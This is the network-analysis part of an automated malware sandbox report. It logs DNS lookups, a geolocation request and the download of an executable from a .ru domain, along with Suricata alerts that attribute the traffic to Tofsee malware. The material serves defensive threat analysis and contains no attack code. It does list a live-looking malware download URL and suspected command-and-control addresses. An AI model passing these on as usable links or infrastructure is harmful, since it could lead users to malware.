Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
8dyv.alemention.ru | 81.177.140.11 | |
api.ip.sb | 104.26.13.31 |
- UDP Requests
-
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:56754 239.255.255.250:3702
-
192.168.56.102:56756 239.255.255.250:3702
-
192.168.56.102:56758 239.255.255.250:3702
-
GET
200
https://api.ip.sb/geoip
REQUEST
RESPONSE
BODY
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 10:02:47 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d513114623c015eb777f27551aca78d621616407367; expires=Wed, 21-Apr-21 10:02:47 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08fafc268e000042e908b42000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YXtVaoO9QqDzIhPNxvaPwN36fWwI0Fj7NzkPEto8vDnGTHw13DlIKRsdO2i%2BUwvXCjiyWpPP54ahfvAyrZkzE3d%2FanWWIHDul94%3D"}],"max_age":604800}
NEL: {"max_age":604800,"report_to":"cf-nel"}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633e961dac2142e9-LAX
GET
200
https://8dyv.alemention.ru/477684561.exe
REQUEST
RESPONSE
BODY
GET /477684561.exe HTTP/1.1
Host: 8dyv.alemention.ru
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 10:03:01 GMT
Content-Type: application/octet-stream
Content-Length: 8388608
Connection: keep-alive
Server: Jino.ru/mod_pizza
Last-Modified: Sun, 21 Mar 2021 10:14:40 GMT
ETag: "a4c934f-800000-5be093796c960"
Accept-Ranges: bytes
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.102:49811 -> 172.67.75.172:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49818 -> 81.177.140.11:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 217.12.209.82:44444 -> 192.168.56.102:49810 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
TCP 217.12.209.82:44444 -> 192.168.56.102:49810 | 2221010 | SURICATA HTTP unable to match response to request | Generic Protocol Command Decode |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49811 172.67.75.172:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49818 81.177.140.11:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=*.8dyv.alemention.ru | c3:4b:3d:b4:84:ee:53:13:ed:8b:f0:63:50:91:bc:53:fa:3c:5a:a8 |
Snort Alerts
No Snort Alerts